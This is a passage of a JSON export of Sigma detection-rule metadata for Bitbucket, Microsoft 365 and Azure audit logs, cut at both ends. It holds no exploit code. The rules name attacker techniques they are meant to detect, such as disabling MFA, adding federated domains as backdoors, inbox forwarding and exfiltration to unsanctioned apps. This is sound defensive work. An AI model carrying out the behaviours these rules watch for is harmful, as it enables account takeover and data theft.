user activity." ], "filename": "bitbucket_audit_project_secret_scanning_allowlist_added.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42ccce6d-7bd3-4930-95cd-e4d83fa94a30", "value": "Bitbucket Project Secret Scanning Allowlist Added" }, { "description": "Detects SSH user login access failures.\nPlease note that this rule can be noisy and is recommended to use with correlation based on \"author.name\" field.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user wrong password attempts." ], "filename": "bitbucket_audit_user_login_failure_via_ssh_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html", "https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml" ], "tags": [ "attack.t1021.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3f90469-fb05-42ce-b67d-0fded91bbef3", "value": "Bitbucket User Login Failure Via SSH" }, { "description": "Detects when a repository is exempted from secret scanning feature.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_secret_scanning_exempt_repository_detected.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b91e8d5e-0033-44fe-973f-b730316f23a1", "value": "Bitbucket Secret Scanning Exempt Repository Added" }, { "description": "Detects user permission data export attempt.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_user_permissions_export_attempt_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml" ], "tags": [ "attack.reconnaissance", "attack.t1213", "attack.t1082", "attack.t1591.004" ] }, "related": [ { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cc723aff-ec88-40e3-a224-5af9fd983cc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87cc6698-3e07-4ba2-9b43-a85a73e151e2", "value": "Bitbucket User Permissions Export Attempt" }, { "description": "Detects the addition of a new Federated Domain.", "meta": { "author": "Splunk Threat Research Team (original rule), '@ionsor (rule)'", "creation_date": "2022-02-08", "falsepositive": [ "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." ], "filename": "microsoft365_new_federated_domain_added_exchange.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://o365blog.com/post/aadbackdoor/", "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", "https://www.sygnia.co/golden-saml-advisory", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml" ], "tags": [ "attack.persistence", "attack.t1136.003" ] }, "related": [ { "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", "value": "New Federated Domain Added - Exchange" }, { "description": "Detects the addition of a new Federated Domain.", "meta": { "author": "Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)", "creation_date": "2023-09-18", "falsepositive": [ "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." ], "filename": "microsoft365_new_federated_domain_added_audit.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/", "https://o365blog.com/post/aadbackdoor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml" ], "tags": [ "attack.persistence", "attack.t1136.003" ] }, "related": [ { "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58f88172-a73d-442b-94c9-95eaed3cbb36", "value": "New Federated Domain Added" }, { "description": "Detects disabling of Multi Factor Authentication.", "meta": { "author": "Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)", "creation_date": "2023-09-18", "falsepositive": [ "Unlikely" ], "filename": "microsoft365_disabling_mfa.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/audit/microsoft365_disabling_mfa.yml" ], "tags": [ "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60de9b57-dc4d-48b9-a6a0-b39e0469f876", "value": "Disabling Multi Factor Authentication" }, { "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_activity_from_infrequent_country.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml" ], "tags": [ "attack.command-and-control", "attack.t1573" ] }, "related": [ { "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f2468a2-5055-4212-a368-7321198ee706", "value": "Activity from Infrequent Country" }, { "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2020-07-06", "falsepositive": [ "Unknown" ], "filename": "microsoft365_impossible_travel_activity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", "value": "Microsoft 365 - Impossible Travel Activity" }, { "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "User using a VPN or Proxy" ], "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml" ], "tags": [ "attack.command-and-control", "attack.t1573" ] }, "related": [ { "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", "value": "Activity from Anonymous IP Addresses" }, { "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", "meta": { "author": "austinsonger", "creation_date": "2021-08-19", "falsepositive": [ "Unknown" ], "filename": "microsoft365_unusual_volume_of_file_deletion.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", "value": "Microsoft 365 - Unusual Volume of File Deletion" }, { "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-22", "falsepositive": [ "Unknown" ], "filename": "microsoft365_susp_inbox_forwarding.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", "value": "Suspicious Inbox Forwarding" }, { "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", "value": "Suspicious OAuth App File Download Activities" }, { "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", "meta": { "author": "Sorina Ionescu", "creation_date": "2022-02-08", "falsepositive": [ "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." ], "filename": "microsoft365_pst_export_alert.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml" ], "tags": [ "attack.collection", "attack.t1114" ] }, "related": [ { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", "value": "PST Export Alert Using eDiscovery Alert" }, { "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", "meta": { "author": "austinsonger", "creation_date": "2021-08-19", "falsepositive": [ "Unknown" ], "filename": "microsoft365_user_restricted_from_sending_email.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml" ], "tags": [ "attack.initial-access", "attack.t1199" ] }, "related": [ { "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", "value": "Microsoft 365 - User Restricted from Sending Email" }, { "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", "meta": { "author": "austinsonger", "creation_date": "2021-08-19", "falsepositive": [ "Unknown" ], "filename": "microsoft365_potential_ransomware_activity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", "value": "Microsoft 365 - Potential Ransomware Activity" }, { "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_activity_by_terminated_user.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml" ], "tags": [ "attack.impact" ] }, "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", "value": "Activity Performed by Terminated User" }, { "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_logon_from_risky_ip_address.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", "value": "Logon from a Risky IP Address" }, { "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml" ], "tags": [ "attack.exfiltration", "attack.t1537" ] }, "related": [ { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", "value": "Data Exfiltration to Unsanctioned Apps" }, { "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", "meta": { "author": "Nikita Khalimonenkov", "creation_date": "2022-11-17", "falsepositive": [ "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." ], "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" ], "tags": [ "attack.collection", "attack.t1114" ] }, "related": [ { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6897cd82-6664-11ed-9022-0242ac120002", "value": "PST Export Alert Using New-ComplianceSearchAction" }, { "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_from_susp_ip_addresses.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml" ], "tags": [ "attack.command-and-control", "attack.t1573" ] }, "related": [ { "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", "value": "Activity from Suspicious IP Addresses" }, { "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", "meta": { "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", "creation_date": "2022-08-04", "falsepositive": [ "User removed from the group is approved" ], "filename": "azure_group_user_removal_ca_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1548", "attack.t1556" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", "value": "User Removed From Group With CA Policy Modification Access" }, { "description": "Detects changes to the \"StrongAuthenticationRequirement\" value, where the state is set to \"0\" or \"Disabled\".\nThreat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.\n", "meta": { "author": "Harjot Singh (@cyb3rjy0t)", "creation_date": "2024-08-21", "falsepositive": [ "Legitimate authorized activity." ], "filename": "azure_user_account_mfa_disable.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_user_account_mfa_disable.yml" ], "tags": [ "attack.credential-access", "attack.persistence" ] }, "uuid": "b18454c8-0be3-41f7-86bc-9c614611b839", "value": "Multi Factor Authentication Disabled For User Account" }, { "description": "Monitor and alert for users added to device admin roles.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_users_added_to_device_admin_roles.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11c767ae-500b-423b-bae3-b234450736ed", "value": "Users Added to Global or Device Admin Roles" }, { "description": "Detects when a new admin is created.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", "creation_date": "2022-08-11", "falsepositive": [ "A legitimate new admin account being created" ], "filename": "azure_privileged_account_creation.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", "value": "Privileged Account Creation" }, { "description": "Detects when a user is added to a privileged role.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-06", "falsepositive": [ "Legtimate administrator actions of adding members from a role" ], "filename": "azure_priviledged_role_assignment_add.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", "value": "User Added To Privilege Role" }, { "description": "Monitor and alert for changes to the device registration policy.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_device_registration_policy_changes.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1484" ] }, "related": [ { "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", "value": "Changes to Device Registration Policy" }, { "description": "Detects guest users being invited to tenant by non-approved inviters", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-28", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", "value": "Guest Users Invited To Tenant By Non Approved Inviters" }, { "description": "Monitor and alert on conditional access changes.", "meta": { "author": "Corissa Koopmans, '@corissalea'", "creation_date": "2022-07-18", "falsepositive": [ "Misconfigured role permissions", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." ], "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" ], "tags": [ "attack.defense-evasion", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", "value": "New CA Policy by Non-approved Actor" }, { "description": "Identifies when an user or application modified the federation settings on the domain.", "meta": { "author": "Austin Songer", "creation_date": "2021-09-06", "falsepositive": [ "Federation Settings being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "azure_federation_modified.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_federation_modified.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", "value": "Azure Domain Federation Settings Modified" }, { "description": "Detects when an end user consents to an application", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-28", "falsepositive": [ "Unknown" ], "filename": "azure_app_end_user_consent.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", "value": "End User Consent" }, { "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-10", "falsepositive": [ "A non malicious user is unaware of the proper process" ], "filename": "azure_guest_invite_failure.yml", "level": "medium", "logsource.category": "No 